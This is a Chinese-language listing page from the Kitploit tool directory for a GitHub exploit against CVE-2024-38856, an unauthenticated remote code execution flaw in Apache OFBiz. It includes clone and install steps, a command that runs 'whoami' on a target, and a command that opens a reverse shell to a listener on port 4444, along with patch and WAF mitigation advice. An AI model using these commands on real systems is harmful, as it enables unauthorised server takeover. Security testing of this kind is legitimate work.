Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Apache-OFBiz-Exploit — 针对 Apache OFBiz 的漏洞利用 - CVE-2024-38856 | Kitploit
工具/GitHubGitHub/alissonfaoli/apache-ofbiz-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubalissonfaoli/apache-ofbiz-exploit

Apache-OFBiz-Exploit

针对 Apache OFBiz 的漏洞利用 - CVE-2024-38856

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Apache-OFBiz-Exploit

Apache OFBiz漏洞利用工具(CVE-2024-38856) 作者:Alisson Faoli

描述

该仓库包含针对 Apache OFBiz 中 CVE-2024-38856 漏洞的利用工具。该漏洞允许未认证的远程代码执行(RCE)。

注意:此利用工具仅供教育和研究目的使用。滥用可能违法,用户须自行承担全部责任。

漏洞详情

CVE:CVE-2024-38856

受影响软件:Apache OFBiz 至 18.12.14 版本

漏洞类型:RCE

利用条件:无需认证

参考

  • https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
  • https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/

使用方法

克隆仓库:

root@kitploit:~
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit

安装依赖:

root@kitploit:~
pip install -r requirements.txt

运行利用工具:

RCE: python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"

SHELL: python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444

缓解措施

为修复此漏洞,建议 Apache OFBiz 管理员: 更新至补丁版本,可从 https://ofbiz.apache.org/download.html 获取。 应用防火墙或 WAF 规则以阻止已知的利用尝试。

联系方式

如有任何疑问或希望报告对利用工具的改进,请联系我: LinkedIn:https://linkedin.com/in/alisson-faoli/

法律免责声明:

此代码仅提供用于教育目的和在授权环境中进行安全测试。作者不对任何滥用行为负责。

下载工具